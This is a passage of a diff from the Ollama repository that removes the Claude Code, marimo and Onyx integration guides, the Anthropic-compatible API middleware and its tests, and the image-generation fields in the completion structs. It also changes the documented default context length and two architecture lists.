-              "/api/anthropic-compatibility"
+              "/api/openai-compatibility"
            ]
          },
          {
--- a/docs/faq.mdx
+++ b/docs/faq.mdx
@@ -22,7 +22,7 @@ Please refer to the [GPU docs](./gpu).

 ## How can I specify the context window size?

-By default, Ollama uses a context window size of 4096 tokens.
+By default, Ollama uses a context window size of 2048 tokens.

 This can be overridden with the `OLLAMA_CONTEXT_LENGTH` environment variable. For example, to set the default context window to 8K, use:

--- a/docs/images/marimo-add-model.png
+++ b/docs/images/marimo-add-model.png
--- a/docs/images/marimo-chat.png
+++ b/docs/images/marimo-chat.png
--- a/docs/images/marimo-code-completion.png
+++ b/docs/images/marimo-code-completion.png
--- a/docs/images/marimo-models.png
+++ b/docs/images/marimo-models.png
--- a/docs/images/marimo-settings.png
+++ b/docs/images/marimo-settings.png
--- a/docs/images/onyx-login.png
+++ b/docs/images/onyx-login.png
--- a/docs/images/onyx-ollama-form.png
+++ b/docs/images/onyx-ollama-form.png
--- a/docs/images/onyx-ollama-llm.png
+++ b/docs/images/onyx-ollama-llm.png
--- a/docs/images/onyx-query.png
+++ b/docs/images/onyx-query.png
--- a/docs/integrations/claude-code.mdx
+++ b/docs/integrations/claude-code.mdx
@@ -1,78 +0,0 @@
---
-title: Claude Code
---
-
-Claude Code is Anthropic's agentic coding tool that can read, modify, and execute code in your working directory. 
-
-Open models can be used with Claude Code through Ollama's Anthropic-compatible API, enabling you to use models such as `qwen3-coder`, `gpt-oss:20b`, or other models.
-
-![Claude Code with Ollama](https://files.ollama.com/claude-code.png)
-
-## Install
-
-Install [Claude Code](https://code.claude.com/docs/en/overview):
-
-<CodeGroup>
-
-```shell macOS / Linux
-curl -fsSL https://claude.ai/install.sh | bash
-```
-
-```powershell Windows
-irm https://claude.ai/install.ps1 | iex
-```
-
-</CodeGroup>
-
-## Usage with Ollama
-
-Claude Code connects to Ollama using the Anthropic-compatible API.
-
-1. Set the environment variables:
-
-```shell
-export ANTHROPIC_AUTH_TOKEN=ollama
-export ANTHROPIC_BASE_URL=http://localhost:11434
-```
-
-2. Run Claude Code with an Ollama model:
-
-```shell
-claude --model gpt-oss:20b
-```
-
-Or run with environment variables inline:
-
-```shell
-ANTHROPIC_AUTH_TOKEN=ollama ANTHROPIC_BASE_URL=http://localhost:11434 claude --model gpt-oss:20b
-```
-
-**Note:** Claude Code requires a large context window. We recommend at least 32K tokens. See the [context length documentation](/context-length) for how to adjust context length in Ollama.
-
-## Connecting to ollama.com
-
-1. Create an [API key](https://ollama.com/settings/keys) on ollama.com
-2. Set the environment variables:
-
-```shell
-export ANTHROPIC_BASE_URL=https://ollama.com
-export ANTHROPIC_API_KEY=<your-api-key>
-```
-
-3. Run Claude Code with a cloud model:
-
-```shell
-claude --model glm-4.7:cloud
-```
-
-## Recommended Models
-
-### Cloud models
- `glm-4.7:cloud` - High-performance cloud model
- `minimax-m2.1:cloud` - Fast cloud model
- `qwen3-coder:480b` - Large coding model
-
-### Local models
- `qwen3-coder` - Excellent for coding tasks
- `gpt-oss:20b` - Strong general-purpose model
- `gpt-oss:120b` - Larger general-purpose model for more complex tasks
--- a/docs/integrations/marimo.mdx
+++ b/docs/integrations/marimo.mdx
@@ -1,73 +0,0 @@
---
-title: marimo
---
-
-## Install
-
-Install [marimo](https://marimo.io). You can use `pip` or `uv` for this. You 
-can also use `uv` to create a sandboxed environment for marimo by running:
-
-```
-uvx marimo edit --sandbox notebook.py
-```
-
-## Usage with Ollama
-
-1. In marimo, go to the user settings and go to the AI tab. From here
-you can find and configure Ollama as an AI provider. For local use you
-would typically point the base url to `http://localhost:11434/v1`.
-
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/marimo-settings.png" 
-    alt="Ollama settings in marimo"
-    width="50%"
-  />
-</div>
-
-2. Once the AI provider is set up, you can turn on/off specific AI models you'd like to access. 
-
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/marimo-models.png" 
-    alt="Selecting an Ollama model"
-    width="50%"
-  />
-</div>
-
-3. You can also add a model to the list of available models by scrolling to the bottom and using the UI there. 
-
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/marimo-add-model.png" 
-    alt="Adding a new Ollama model"
-    width="50%"
-  />
-</div>
-
-4. Once configured, you can now use Ollama for AI chats in marimo.
-
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/marimo-chat.png" 
-    alt="Configure code completion"
-    width="50%"
-  />
-</div>
-
-4. Alternatively, you can now use Ollama for **inline code completion** in marimo. This can be configured in the "AI Features" tab. 
-
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/marimo-code-completion.png" 
-    alt="Configure code completion"
-    width="50%"
-  />
-</div>
-
-
-## Connecting to ollama.com
-
-1. Sign in to ollama cloud via `ollama signin` 
-2. In the ollama model settings add a model that ollama hosts, like `gpt-oss:120b`.
-3. You can now refer to this model in marimo!
--- a/docs/integrations/onyx.mdx
+++ b/docs/integrations/onyx.mdx
@@ -1,63 +0,0 @@
---
-title: Onyx
---
-
-## Overview
-[Onyx](http://onyx.app/) is a self-hostable Chat UI that integrates with all Ollama models. Features include:
- Creating custom Agents
- Web search
- Deep Research
- RAG over uploaded documents and connected apps
- Connectors to applications like Google Drive, Email, Slack, etc.
- MCP and OpenAPI Actions support
- Image generation
- User/Groups management, RBAC, SSO, etc.
-
-Onyx can be deployed for single users or large organizations.
-
-## Install Onyx
-
-Deploy Onyx with the [quickstart guide](https://docs.onyx.app/deployment/getting_started/quickstart).
-
-<Info>
-Resourcing/scaling docs [here](https://docs.onyx.app/deployment/getting_started/resourcing).
-</Info>
-
-## Usage with Ollama 
-
-1. Login to your Onyx deployment (create an account first).
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/onyx-login.png" 
-    alt="Onyx Login Page"
-    width="75%"
-  />
-</div>
-2. In the set-up process select `Ollama` as the LLM provider.
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/onyx-ollama-llm.png" 
-    alt="Onyx Set Up Form"
-    width="75%"
-  />
-</div>
-3. Provide your **Ollama API URL** and select your models.
-<Note>If you're running Onyx in Docker, to access your computer's local network use `http://host.docker.internal` instead of `http://127.0.0.1`.</Note>
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/onyx-ollama-form.png" 
-    alt="Selecting Ollama Models"
-    width="75%"
-  />
-</div>
-
-You can also easily connect up Onyx Cloud with the `Ollama Cloud` tab of the setup.
-
-## Send your first query
-<div style={{ display: 'flex', justifyContent: 'center' }}>
-  <img 
-    src="/images/onyx-query.png" 
-    alt="Onyx Query Example"
-    width="75%"
-  />
-</div>
--- a/docs/troubleshooting.md
+++ b/docs/troubleshooting.md
@@ -0,0 +1,3 @@
+# Troubleshooting
+
+For troubleshooting, see [https://docs.ollama.com/troubleshooting](https://docs.ollama.com/troubleshooting)
--- a/fs/ggml/ggml.go
+++ b/fs/ggml/ggml.go
@@ -269,7 +269,6 @@ func (kv KV) OllamaEngineRequired() bool {
 		"qwen25vl",
 		"qwen3", "qwen3moe",
 		"qwen3vl", "qwen3vlmoe",
-		"glm4moelite",
 	}, kv.Architecture())
 }

@@ -857,7 +856,6 @@ func (f GGML) FlashAttention() bool {
 	return slices.Contains([]string{
 		"bert",
 		"gemma3",
-		"glm4moelite",
 		"gptoss", "gpt-oss",
 		"mistral3",
 		"olmo3",
--- a/integration/tools_test.go
+++ b/integration/tools_test.go
@@ -131,7 +131,7 @@ func TestAPIToolCalling(t *testing.T) {
 					t.Errorf("unexpected tool called: got %q want %q", lastToolCall.Function.Name, "get_weather")
 				}

-				if _, ok := lastToolCall.Function.Arguments.Get("location"); !ok {
+				if _, ok := lastToolCall.Function.Arguments["location"]; !ok {
 					t.Errorf("expected tool arguments to include 'location', got: %s", lastToolCall.Function.Arguments.String())
 				}
 			case <-ctx.Done():
--- a/llm/server.go
+++ b/llm/server.go
@@ -1464,12 +1464,6 @@ type CompletionRequest struct {

 	// TopLogprobs specifies the number of most likely alternative tokens to return (0-20)
 	TopLogprobs int
-
-	// Image generation fields
-	Width  int32 `json:"width,omitempty"`
-	Height int32 `json:"height,omitempty"`
-	Steps  int32 `json:"steps,omitempty"`
-	Seed   int64 `json:"seed,omitempty"`
 }

 // DoneReason represents the reason why a completion response is done
@@ -1518,15 +1512,6 @@ type CompletionResponse struct {

 	// Logprobs contains log probability information if requested
 	Logprobs []Logprob `json:"logprobs,omitempty"`
-
-	// Image contains base64-encoded image data for image generation
-	Image string `json:"image,omitempty"`
-
-	// Step is the current step in image generation
-	Step int `json:"step,omitempty"`
-
-	// TotalSteps is the total number of steps for image generation
-	TotalSteps int `json:"total_steps,omitempty"`
 }

 func (s *llmServer) Completion(ctx context.Context, req CompletionRequest, fn func(CompletionResponse)) error {
--- a/middleware/anthropic.go
+++ b/middleware/anthropic.go
@@ -1,152 +0,0 @@
-package middleware
-
-import (
-	"bytes"
-	"encoding/json"
-	"fmt"
-	"io"
-	"net/http"
-
-	"github.com/gin-gonic/gin"
-
-	"github.com/ollama/ollama/anthropic"
-	"github.com/ollama/ollama/api"
-)
-
-// AnthropicWriter wraps the response writer to transform Ollama responses to Anthropic format
-type AnthropicWriter struct {
-	BaseWriter
-	stream    bool
-	id        string
-	model     string
-	converter *anthropic.StreamConverter
-}
-
-func (w *AnthropicWriter) writeError(data []byte) (int, error) {
-	var errData struct {
-		Error string `json:"error"`
-	}
-	if err := json.Unmarshal(data, &errData); err != nil {
-		return 0, err
-	}
-
-	w.ResponseWriter.Header().Set("Content-Type", "application/json")
-	err := json.NewEncoder(w.ResponseWriter).Encode(anthropic.NewError(w.ResponseWriter.Status(), errData.Error))
-	if err != nil {
-		return 0, err
-	}
-
-	return len(data), nil
-}
-
-func (w *AnthropicWriter) writeEvent(eventType string, data any) error {
-	d, err := json.Marshal(data)
-	if err != nil {
-		return err
-	}
-	_, err = w.ResponseWriter.Write([]byte(fmt.Sprintf("event: %s\ndata: %s\n\n", eventType, d)))
-	if err != nil {
-		return err
-	}
-	if f, ok := w.ResponseWriter.(http.Flusher); ok {
-		f.Flush()
-	}
-	return nil
-}
-
-func (w *AnthropicWriter) writeResponse(data []byte) (int, error) {
-	var chatResponse api.ChatResponse
-	err := json.Unmarshal(data, &chatResponse)
-	if err != nil {
-		return 0, err
-	}
-
-	if w.stream {
-		w.ResponseWriter.Header().Set("Content-Type", "text/event-stream")
-
-		events := w.converter.Process(chatResponse)
-		for _, event := range events {
-			if err := w.writeEvent(event.Event, event.Data); err != nil {
-				return 0, err
-			}
-		}
-		return len(data), nil
-	}
-
-	w.ResponseWriter.Header().Set("Content-Type", "application/json")
-	response := anthropic.ToMessagesResponse(w.id, chatResponse)
-	return len(data), json.NewEncoder(w.ResponseWriter).Encode(response)
-}
-
-func (w *AnthropicWriter) Write(data []byte) (int, error) {
-	code := w.ResponseWriter.Status()
-	if code != http.StatusOK {
-		return w.writeError(data)
-	}
-
-	return w.writeResponse(data)
-}
-
-// AnthropicMessagesMiddleware handles Anthropic Messages API requests
-func AnthropicMessagesMiddleware() gin.HandlerFunc {
-	return func(c *gin.Context) {
-		var req anthropic.MessagesRequest
-		err := c.ShouldBindJSON(&req)
-		if err != nil {
-			c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, err.Error()))
-			return
-		}
-
-		if req.Model == "" {
-			c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "model is required"))
-			return
-		}
-
-		if req.MaxTokens <= 0 {
-			c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "max_tokens is required and must be positive"))
-			return
-		}
-
-		if len(req.Messages) == 0 {
-			c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "messages is required"))
-			return
-		}
-
-		chatReq, err := anthropic.FromMessagesRequest(req)
-		if err != nil {
-			c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, err.Error()))
-			return
-		}
-
-		// Set think to nil when being used with Anthropic API to connect to tools like claude code
-		c.Set("relax_thinking", true)
-
-		var b bytes.Buffer
-		if err := json.NewEncoder(&b).Encode(chatReq); err != nil {
-			c.AbortWithStatusJSON(http.StatusInternalServerError, anthropic.NewError(http.StatusInternalServerError, err.Error()))
-			return
-		}
-
-		c.Request.Body = io.NopCloser(&b)
-
-		messageID := anthropic.GenerateMessageID()
-
-		w := &AnthropicWriter{
-			BaseWriter: BaseWriter{ResponseWriter: c.Writer},
-			stream:     req.Stream,
-			id:         messageID,
-			model:      req.Model,
-			converter:  anthropic.NewStreamConverter(messageID, req.Model),
-		}
-
-		if req.Stream {
-			c.Writer.Header().Set("Content-Type", "text/event-stream")
-			c.Writer.Header().Set("Cache-Control", "no-cache")
-			c.Writer.Header().Set("Connection", "keep-alive")
-		}
-
-		c.Writer = w
-
-		c.Next()
-	}
-}
--- a/middleware/anthropic_test.go
+++ b/middleware/anthropic_test.go
@@ -1,607 +0,0 @@
-package middleware
-
-import (
-	"bytes"
-	"encoding/json"
-	"io"
-	"net/http"
-	"net/http/httptest"
-	"strings"
-	"testing"
-
-	"github.com/gin-gonic/gin"
-	"github.com/google/go-cmp/cmp"
-	"github.com/google/go-cmp/cmp/cmpopts"
-
-	"github.com/ollama/ollama/anthropic"
-	"github.com/ollama/ollama/api"
-)
-
-func captureAnthropicRequest(capturedRequest any) gin.HandlerFunc {
-	return func(c *gin.Context) {
-		bodyBytes, _ := io.ReadAll(c.Request.Body)
-		c.Request.Body = io.NopCloser(bytes.NewReader(bodyBytes))
-		_ = json.Unmarshal(bodyBytes, capturedRequest)
-		c.Next()
-	}
-}
-
-// testProps creates ToolPropertiesMap from a map (convenience function for tests)
-func testProps(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
-	props := api.NewToolPropertiesMap()
-	for k, v := range m {
-		props.Set(k, v)
-	}
-	return props
-}
-
-func TestAnthropicMessagesMiddleware(t *testing.T) {
-	type testCase struct {
-		name string
-		body string
-		req  api.ChatRequest
-		err  anthropic.ErrorResponse
-	}
-
-	var capturedRequest *api.ChatRequest
-	stream := true
-
-	testCases := []testCase{
-		{
-			name: "basic message",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "Hello"},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &False,
-			},
-		},
-		{
-			name: "with system prompt",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"system": "You are helpful.",
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "system", Content: "You are helpful."},
-					{Role: "user", Content: "Hello"},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &False,
-			},
-		},
-		{
-			name: "with options",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 2048,
-				"temperature": 0.7,
-				"top_p": 0.9,
-				"top_k": 40,
-				"stop_sequences": ["\n", "END"],
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "Hello"},
-				},
-				Options: map[string]any{
-					"num_predict": 2048,
-					"temperature": 0.7,
-					"top_p":       0.9,
-					"top_k":       40,
-					"stop":        []string{"\n", "END"},
-				},
-				Stream: &False,
-			},
-		},
-		{
-			name: "streaming",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"stream": true,
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "Hello"},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &stream,
-			},
-		},
-		{
-			name: "with tools",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"messages": [
-					{"role": "user", "content": "What's the weather?"}
-				],
-				"tools": [{
-					"name": "get_weather",
-					"description": "Get current weather",
-					"input_schema": {
-						"type": "object",
-						"properties": {
-							"location": {"type": "string"}
-						},
-						"required": ["location"]
-					}
-				}]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "What's the weather?"},
-				},
-				Tools: []api.Tool{
-					{
-						Type: "function",
-						Function: api.ToolFunction{
-							Name:        "get_weather",
-							Description: "Get current weather",
-							Parameters: api.ToolFunctionParameters{
-								Type:     "object",
-								Required: []string{"location"},
-								Properties: testProps(map[string]api.ToolProperty{
-									"location": {Type: api.PropertyType{"string"}},
-								}),
-							},
-						},
-					},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &False,
-			},
-		},
-		{
-			name: "with tool result",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"messages": [
-					{"role": "user", "content": "What's the weather?"},
-					{"role": "assistant", "content": [
-						{"type": "tool_use", "id": "call_123", "name": "get_weather", "input": {"location": "Paris"}}
-					]},
-					{"role": "user", "content": [
-						{"type": "tool_result", "tool_use_id": "call_123", "content": "Sunny, 22°C"}
-					]}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "What's the weather?"},
-					{
-						Role: "assistant",
-						ToolCalls: []api.ToolCall{
-							{
-								ID: "call_123",
-								Function: api.ToolCallFunction{
-									Name:      "get_weather",
-									Arguments: testArgs(map[string]any{"location": "Paris"}),
-								},
-							},
-						},
-					},
-					{Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call_123"},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &False,
-			},
-		},
-		{
-			name: "with thinking enabled",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"thinking": {"type": "enabled", "budget_tokens": 1000},
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			req: api.ChatRequest{
-				Model: "test-model",
-				Messages: []api.Message{
-					{Role: "user", Content: "Hello"},
-				},
-				Options: map[string]any{"num_predict": 1024},
-				Stream:  &False,
-				Think:   &api.ThinkValue{Value: true},
-			},
-		},
-		{
-			name: "missing model error",
-			body: `{
-				"max_tokens": 1024,
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			err: anthropic.ErrorResponse{
-				Type: "error",
-				Error: anthropic.Error{
-					Type:    "invalid_request_error",
-					Message: "model is required",
-				},
-			},
-		},
-		{
-			name: "missing max_tokens error",
-			body: `{
-				"model": "test-model",
-				"messages": [
-					{"role": "user", "content": "Hello"}
-				]
-			}`,
-			err: anthropic.ErrorResponse{
-				Type: "error",
-				Error: anthropic.Error{
-					Type:    "invalid_request_error",
-					Message: "max_tokens is required and must be positive",
-				},
-			},
-		},
-		{
-			name: "missing messages error",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024
-			}`,
-			err: anthropic.ErrorResponse{
-				Type: "error",
-				Error: anthropic.Error{
-					Type:    "invalid_request_error",
-					Message: "messages is required",
-				},
-			},
-		},
-		{
-			name: "tool_use missing id error",
-			body: `{
-				"model": "test-model",
-				"max_tokens": 1024,
-				"messages": [
-					{"role": "assistant", "content": [
-						{"type": "tool_use", "name": "test"}
-					]}
-				]
-			}`,
-			err: anthropic.ErrorResponse{
-				Type: "error",
-				Error: anthropic.Error{
-					Type:    "invalid_request_error",
-					Message: "tool_use block missing required 'id' field",
-				},
-			},
-		},
-	}
-
-	endpoint := func(c *gin.Context) {
-		c.Status(http.StatusOK)
-	}
-
-	gin.SetMode(gin.TestMode)
-	router := gin.New()
-	router.Use(AnthropicMessagesMiddleware(), captureAnthropicRequest(&capturedRequest))
-	router.Handle(http.MethodPost, "/v1/messages", endpoint)
-
-	for _, tc := range testCases {
-		t.Run(tc.name, func(t *testing.T) {
-			req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(tc.body))
-			req.Header.Set("Content-Type", "application/json")
-
-			defer func() { capturedRequest = nil }()
-
-			resp := httptest.NewRecorder()
-			router.ServeHTTP(resp, req)
-
-			if tc.err.Type != "" {
-				// Expect error
-				if resp.Code == http.StatusOK {
-					t.Fatalf("expected error response, got 200 OK")
-				}
-				var errResp anthropic.ErrorResponse
-				if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
-					t.Fatalf("failed to unmarshal error: %v", err)
-				}
-				if errResp.Type != tc.err.Type {
-					t.Errorf("expected error type %q, got %q", tc.err.Type, errResp.Type)
-				}
-				if errResp.Error.Type != tc.err.Error.Type {
-					t.Errorf("expected error.type %q, got %q", tc.err.Error.Type, errResp.Error.Type)
-				}
-				if errResp.Error.Message != tc.err.Error.Message {
-					t.Errorf("expected error.message %q, got %q", tc.err.Error.Message, errResp.Error.Message)
-				}
-				return
-			}
-
-			if resp.Code != http.StatusOK {
-				t.Fatalf("unexpected status code: %d, body: %s", resp.Code, resp.Body.String())
-			}
-
-			if capturedRequest == nil {
-				t.Fatal("request was not captured")
-			}
-
-			// Compare relevant fields
-			if capturedRequest.Model != tc.req.Model {
-				t.Errorf("model mismatch: got %q, want %q", capturedRequest.Model, tc.req.Model)
-			}
-
-			if diff := cmp.Diff(tc.req.Messages, capturedRequest.Messages,
-				cmpopts.IgnoreUnexported(api.ToolCallFunctionArguments{}, api.ToolPropertiesMap{})); diff != "" {
-				t.Errorf("messages mismatch (-want +got):\n%s", diff)
-			}
-
-			if tc.req.Stream != nil && capturedRequest.Stream != nil {
-				if *tc.req.Stream != *capturedRequest.Stream {
-					t.Errorf("stream mismatch: got %v, want %v", *capturedRequest.Stream, *tc.req.Stream)
-				}
-			}
-
-			if tc.req.Think != nil {
-				if capturedRequest.Think == nil {
-					t.Error("expected Think to be set")
-				} else if capturedRequest.Think.Value != tc.req.Think.Value {
-					t.Errorf("Think mismatch: got %v, want %v", capturedRequest.Think.Value, tc.req.Think.Value)
-				}
-			}
-		})
-	}
-}
-
-func TestAnthropicMessagesMiddleware_Headers(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	t.Run("streaming sets correct headers", func(t *testing.T) {
-		router := gin.New()
-		router.Use(AnthropicMessagesMiddleware())
-		router.POST("/v1/messages", func(c *gin.Context) {
-			// Check headers were set
-			if c.Writer.Header().Get("Content-Type") != "text/event-stream" {
-				t.Errorf("expected Content-Type text/event-stream, got %q", c.Writer.Header().Get("Content-Type"))
-			}
-			if c.Writer.Header().Get("Cache-Control") != "no-cache" {
-				t.Errorf("expected Cache-Control no-cache, got %q", c.Writer.Header().Get("Cache-Control"))
-			}
-			c.Status(http.StatusOK)
-		})
-
-		body := `{"model": "test", "max_tokens": 100, "stream": true, "messages": [{"role": "user", "content": "Hi"}]}`
-		req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
-		req.Header.Set("Content-Type", "application/json")
-
-		resp := httptest.NewRecorder()
-		router.ServeHTTP(resp, req)
-	})
-}
-
-func TestAnthropicMessagesMiddleware_InvalidJSON(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-	router := gin.New()
-	router.Use(AnthropicMessagesMiddleware())
-	router.POST("/v1/messages", func(c *gin.Context) {
-		c.Status(http.StatusOK)
-	})
-
-	req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(`{invalid json`))
-	req.Header.Set("Content-Type", "application/json")
-
-	resp := httptest.NewRecorder()
-	router.ServeHTTP(resp, req)
-
-	if resp.Code != http.StatusBadRequest {
-		t.Errorf("expected status 400, got %d", resp.Code)
-	}
-
-	var errResp anthropic.ErrorResponse
-	if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
-		t.Fatalf("failed to unmarshal error: %v", err)
-	}
-
-	if errResp.Type != "error" {
-		t.Errorf("expected type 'error', got %q", errResp.Type)
-	}
-	if errResp.Error.Type != "invalid_request_error" {
-		t.Errorf("expected error type 'invalid_request_error', got %q", errResp.Error.Type)
-	}
-}
-
-func TestAnthropicWriter_NonStreaming(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	router := gin.New()
-	router.Use(AnthropicMessagesMiddleware())
-	router.POST("/v1/messages", func(c *gin.Context) {
-		// Simulate Ollama response
-		resp := api.ChatResponse{
-			Model: "test-model",
-			Message: api.Message{
-				Role:    "assistant",
-				Content: "Hello there!",
-			},
-			Done:       true,
-			DoneReason: "stop",
-			Metrics: api.Metrics{
-				PromptEvalCount: 10,
-				EvalCount:       5,
-			},
-		}
-		data, _ := json.Marshal(resp)
-		c.Writer.WriteHeader(http.StatusOK)
-		_, _ = c.Writer.Write(data)
-	})
-
-	body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
-	req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
-	req.Header.Set("Content-Type", "application/json")
-
-	resp := httptest.NewRecorder()
-	router.ServeHTTP(resp, req)
-
-	if resp.Code != http.StatusOK {
-		t.Fatalf("expected status 200, got %d", resp.Code)
-	}
-
-	var result anthropic.MessagesResponse
-	if err := json.Unmarshal(resp.Body.Bytes(), &result); err != nil {
-		t.Fatalf("failed to unmarshal response: %v", err)
-	}
-
-	if result.Type != "message" {
-		t.Errorf("expected type 'message', got %q", result.Type)
-	}
-	if result.Role != "assistant" {
-		t.Errorf("expected role 'assistant', got %q", result.Role)
-	}
-	if len(result.Content) != 1 {
-		t.Fatalf("expected 1 content block, got %d", len(result.Content))
-	}
-	if result.Content[0].Text == nil || *result.Content[0].Text != "Hello there!" {
-		t.Errorf("expected text 'Hello there!', got %v", result.Content[0].Text)
-	}
-	if result.StopReason != "end_turn" {
-		t.Errorf("expected stop_reason 'end_turn', got %q", result.StopReason)
-	}
-	if result.Usage.InputTokens != 10 {
-		t.Errorf("expected input_tokens 10, got %d", result.Usage.InputTokens)
-	}
-	if result.Usage.OutputTokens != 5 {
-		t.Errorf("expected output_tokens 5, got %d", result.Usage.OutputTokens)
-	}
-}
-
-// TestAnthropicWriter_ErrorFromRoutes tests error handling when routes.go sends
-// gin.H{"error": "message"} without a StatusCode field (which is the common case)
-func TestAnthropicWriter_ErrorFromRoutes(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	tests := []struct {
-		name          string
-		statusCode    int
-		errorPayload  any
-		wantErrorType string
-		wantMessage   string
-	}{
-		// routes.go sends errors without StatusCode in JSON, so we must use HTTP status
-		{
-			name:          "404 with gin.H error (model not found)",
-			statusCode:    http.StatusNotFound,
-			errorPayload:  gin.H{"error": "model 'nonexistent' not found"},
-			wantErrorType: "not_found_error",
-			wantMessage:   "model 'nonexistent' not found",
-		},
-		{
-			name:          "400 with gin.H error (bad request)",
-			statusCode:    http.StatusBadRequest,
-			errorPayload:  gin.H{"error": "model is required"},
-			wantErrorType: "invalid_request_error",
-			wantMessage:   "model is required",
-		},
-		{
-			name:          "500 with gin.H error (internal error)",
-			statusCode:    http.StatusInternalServerError,
-			errorPayload:  gin.H{"error": "something went wrong"},
-			wantErrorType: "api_error",
-			wantMessage:   "something went wrong",
-		},
-		{
-			name:       "404 with api.StatusError",
-			statusCode: http.StatusNotFound,
-			errorPayload: api.StatusError{
-				StatusCode:   http.StatusNotFound,
-				ErrorMessage: "model not found via StatusError",
-			},
-			wantErrorType: "not_found_error",
-			wantMessage:   "model not found via StatusError",
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			router := gin.New()
-			router.Use(AnthropicMessagesMiddleware())
-			router.POST("/v1/messages", func(c *gin.Context) {
-				// Simulate what routes.go does - set status and write error JSON
-				data, _ := json.Marshal(tt.errorPayload)
-				c.Writer.WriteHeader(tt.statusCode)
-				_, _ = c.Writer.Write(data)
-			})
-
-			body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
-			req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
-			req.Header.Set("Content-Type", "application/json")
-
-			resp := httptest.NewRecorder()
-			router.ServeHTTP(resp, req)
-
-			if resp.Code != tt.statusCode {
-				t.Errorf("expected status %d, got %d", tt.statusCode, resp.Code)
-			}
-
-			var errResp anthropic.ErrorResponse
-			if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
-				t.Fatalf("failed to unmarshal error response: %v\nbody: %s", err, resp.Body.String())
-			}
-
-			if errResp.Type != "error" {
-				t.Errorf("expected type 'error', got %q", errResp.Type)
-			}
-			if errResp.Error.Type != tt.wantErrorType {
-				t.Errorf("expected error type %q, got %q", tt.wantErrorType, errResp.Error.Type)
-			}
-			if errResp.Error.Message != tt.wantMessage {
-				t.Errorf("expected message %q, got %q", tt.wantMessage, errResp.Error.Message)
-			}
-		})
-	}
-}
-
-func TestAnthropicMessagesMiddleware_SetsRelaxThinkingFlag(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	var flagSet bool
-	router := gin.New()
-	router.Use(AnthropicMessagesMiddleware())
-	router.POST("/v1/messages", func(c *gin.Context) {
-		_, flagSet = c.Get("relax_thinking")
-		c.Status(http.StatusOK)
-	})
-
-	body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
-	req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
-	req.Header.Set("Content-Type", "application/json")
-
-	resp := httptest.NewRecorder()
-	router.ServeHTTP(resp, req)
-
-	if !flagSet {
-		t.Error("expected relax_thinking flag to be set in context")
-	}
-}
--- a/middleware/openai.go
